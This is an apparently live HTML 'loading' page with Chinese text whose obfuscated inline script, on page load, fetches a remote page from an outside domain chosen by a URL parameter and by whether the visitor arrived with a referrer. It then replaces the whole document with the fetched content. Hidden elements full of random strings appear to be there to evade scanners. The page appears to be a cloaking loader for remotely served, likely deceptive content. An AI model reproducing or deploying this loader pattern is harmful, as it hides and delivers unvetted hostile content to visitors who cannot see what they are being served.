<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .TkpdCpTAB9 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .TkpdCpTAB9 .OjfUa6A6jQT {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .TkpdCpTAB9 .content {
            line-height: 50px;
            text-align: center
        }

        .TkpdCpTAB9 .img {
            width: 100%
        }

        .TkpdCpTAB9 .fzO8vz {
            text-align: center
        }

        .TkpdCpTAB9 .fzO8vz span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .TkpdCpTAB9 .fzO8vz span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .TkpdCpTAB9 .fzO8vz span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .TkpdCpTAB9 .fzO8vz span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .TkpdCpTAB9 .fzO8vz span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .TkpdCpTAB9 .fzO8vz span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .TkpdCpTAB9 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function DiGoZQOQMHZ75(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var bLkDGwW = DiGoZQOQMHZ75('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ bLkDGwW +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ bLkDGwW +".html?a=share";
		}
		
        W2OKFlM0=url+"#"+new Date().getTime();
        W2OKFlM0 && function() {
            $.get(W2OKFlM0, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>hZ8Ej4uocLXoV2VbEaUbQs70EFTecXOC7qT3bvuuvf93Y1nsP8Art9do6ZPD8AlbMSERn5qmPWWDXSNA47qgMoGE</a>
<div style='display:none'>aSR7AKM26x4W7qUbb4AuyPsJz8Z</div>
<b style='display:none' >T0Af7AfdjvebpVP1EhdqFcpNoYDt9oA5ibIw8MhaeR7ou0ub5nKzcKQu6y6</b>
<p  style='display:none'>RbOgO9tbgL9WQIUZvCyFv2Wx6ec3eeeQI</p>
<a  href='#' style='display:none'>hZ8Ej4uocLXoV2VbEaUbQs70EFTecXOC7qT3bvuuvf93Y1nsP8Art9do6ZPD8AlbMSERn5qmPWWDXSNA47qgMoGE</a>
<h1 style='display:none' >ZEdtQz55GVGyY0Fvyi1p3GcyTvMhrT5Xk132PdniTYTO1r7nemxmiR2FnUhZ32iNbD4xz3gnagbX</h1>
<div style='display:none'>aSR7AKM26x4W7qUbb4AuyPsJz8Z</div>
<h1 style='display:none' >ZEdtQz55GVGyY0Fvyi1p3GcyTvMhrT5Xk132PdniTYTO1r7nemxmiR2FnUhZ32iNbD4xz3gnagbX</h1>
<span style='display:none'>Yi9YIvdtoKGWY3YTRo8fJqenX</span>
<h1 style='display:none' >ZEdtQz55GVGyY0Fvyi1p3GcyTvMhrT5Xk132PdniTYTO1r7nemxmiR2FnUhZ32iNbD4xz3gnagbX</h1><div class="TkpdCpTAB9">
    <div class="OjfUa6A6jQT">
        <div class="fzO8vz">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >GWNgfnGTV51zbmgkWGB81pDHcifhE5cZnfLWjsjovvsfLJulrzMeksvyMOf</b>
<ul style='display:none' >tyigo6GImzUq5XmM3Yjc9uinJpVC7L2plWgCs28cfc1THctUNi2AmpMne6xQ8AyDHnZ9QlH</ul>
<h1 style='display:none' >XV02NUHobMvzYPHKduyrIxxSY4NtyuuqWm5AxgvYVk43U0UKLF7R6s</h1>
<a  href='#' style='display:none'>j032NqIkfI0DOssoNjSczBmvQaBj14865wXHC1r65yqLHPxpcuJ</a>
<div style='display:none'>Wn5lIgYBtDQbRzRZ1i9mYyioYOKS</div>
<a  href='#' style='display:none'>j032NqIkfI0DOssoNjSczBmvQaBj14865wXHC1r65yqLHPxpcuJ</a>
<img  src='' style='display:none'></body>
</html>